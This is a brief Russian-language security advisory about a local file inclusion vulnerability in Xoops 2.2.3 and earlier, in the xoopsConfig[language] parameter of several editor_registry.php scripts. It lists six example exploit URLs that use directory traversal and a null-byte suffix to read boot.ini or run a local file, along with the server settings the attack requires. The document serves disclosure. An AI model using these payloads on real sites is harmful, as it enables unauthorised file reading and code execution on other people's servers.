Программа: Xoops 2.2.3 и более ранние версии
Уязвимость позволяет удаленному пользователю просмотреть или выполнить произвольные локальные файлы на системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «xoopsConfig[language]» в сценарии «class/xoopseditor/textarea/editor_registry.php». Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный локальный файл на системе.
Пример:
http://[target]/[path_to_xoops]/class/xoopseditor/ textarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../script
http://[target]/[path_to_xoops]/class/xoopseditor/ textarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../boot.ini%00
http://[target]/[path_to_xoops]/class/xoopseditor/ koivi/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../script
http://[target]/[path_to_xoops]/class/xoopseditor/ koivi/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../boot.ini%00
http://[target]/[path_to_xoops]/class/xoopseditor/ dhtmltextarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../script
http://[target]/[path_to_xoops]/class/xoopseditor/ dhtmltextarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../boot.ini%00
Для успешной эксплуатации уязвимости, опция «magic_quotes_gpc» должна быть выключена, а опция “register_globals” — включена.